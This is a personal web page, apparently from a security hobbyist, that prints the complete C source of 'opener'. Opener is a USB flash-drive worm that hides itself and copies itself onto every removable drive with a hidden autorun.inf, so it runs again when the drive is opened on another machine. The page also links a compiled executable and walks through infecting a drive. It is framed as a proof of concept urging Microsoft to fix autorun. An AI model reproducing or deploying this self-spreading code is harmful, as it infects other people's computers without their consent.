Opener: A USB Flash Drive VirusFor a really long time, people have been telling Microsoft that autorun.inf is not only a stupid idea, but it's also a security risk. Pretty-much whenever a computer does something the user didn't specifically ask it to do, it's a potential security risk.. and you can always rely on Microsoft to make the potential an actual. Of course, talk is cheap. If autorun.inf is such a big security hole, it really shouldn't be hard to prove should it? Fair enough, here's some code:
#define AUTORUN_CONTENTS "[autorun]\r\nshell\\eject=Eject\r\nshell\\eject\\command=opener.exe\r\nshell=eject\r\n"
HANDLE hmutex = NULL;
void closing()
{
if (hmutex)
ReleaseMutex(hmutex);
}
int APIENTRY _tWinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow)
{
UNREFERENCED_PARAMETER(hPrevInstance);
UNREFERENCED_PARAMETER(lpCmdLine);
WCHAR myfile[1024];
GetModuleFileName(NULL, myfile, 1024);
if (myfile[1] != L':')
return 1;
WCHAR cmd[1024];
wsprintf(cmd, L"explorer %c:\\", myfile[0]);
STARTUPINFOW si;
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION po;
memset(&po, 0, sizeof(po));
CreateProcess(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &po);
hmutex = CreateMutex(NULL, TRUE, L"Opener");
if (hmutex == INVALID_HANDLE_VALUE)
return 1;
if (GetLastError() == ERROR_ALREADY_EXISTS) {
CloseHandle(hmutex);
return 1;
}
atexit(closing);
HANDLE hmyfile = CreateFile(myfile, GENERIC_READ, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hmyfile == NULL)
return 1;
DWORD szhigh = 0;
DWORD szlow = GetFileSize(hmyfile, &szhigh);
if (szhigh != 0) {
CloseHandle(hmyfile);
return 1;
}
void *myfilemem = malloc(szhigh * 65536 + szlow);
DWORD nread;
ReadFile(hmyfile, myfilemem, szlow, &nread, NULL);
CloseHandle(hmyfile);
while(1) {
DWORD mask = GetLogicalDrives();
for (int i = 0; i < 26; i++)
if (mask & (1 << i)) {
WCHAR path[100];
path[0] = L'A' + i;
path[1] = L':';
path[2] = L'\\';
path[3] = 0;
DWORD type = GetDriveType(path);
if (type == DRIVE_REMOVABLE) {
DWORD spc, bps, nfc, tnc;
if (GetDiskFreeSpace(path, &spc, &bps, &nfc, &tnc)) {
if (nfc < tnc) {
wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
if (GetFileAttributes(path) == INVALID_FILE_ATTRIBUTES) {
HANDLE h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
if (h != INVALID_HANDLE_VALUE) {
DWORD written;
WriteFile(h, AUTORUN_CONTENTS, (DWORD)strlen(AUTORUN_CONTENTS), &written, NULL);
CloseHandle(h);
wsprintf(path, L"%c:\\opener.exe", L'A' + i);
h = CreateFile(path, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_HIDDEN, NULL);
if (h != INVALID_HANDLE_VALUE) {
WriteFile(h, myfilemem, szlow, &written, NULL);
CloseHandle(h);
} else {
wsprintf(path, L"%c:\\autorun.inf", L'A' + i);
DeleteFile(path);
}
}
}
}
}
}
}
Sleep(1000 * 60);
}
return 0;
}
download: opener.cpp and here's it compiled: opener.exe.
How does it work?It's really quite simple:
So once opener is running, go ahead and insert a flash drive and wait a little. If you have "show hidden files" turned on in the Folder Options (the default is off, thanks again Microsoft) you will be able to see when the drive has been infected. Remove the drive, and use Task Manager to kill opener.exe, and now plug the drive back in. If you're used to having Windows pop up the "I've found a new drive, what should I do?" box, then you'll immediately notice the change - it won't pop up now. You may have had this experience before.. it's kinda random when Windows will and wont pop up that box. No matter, go to My Computer as you typically would and double click on the drive that has been found.. as you would normally do to open it. If you're like me and turn off the "give me a new window every time I sneeze" behaviour in the Folder Options then you will now notice another slight change in behaviour, in that you will get a new window for the drive. If you check Task Manager now you will see that opener.exe is running again. And so the cycle continues. Dear Microsoft, please fix, thanks. QuantumG << back to my home page |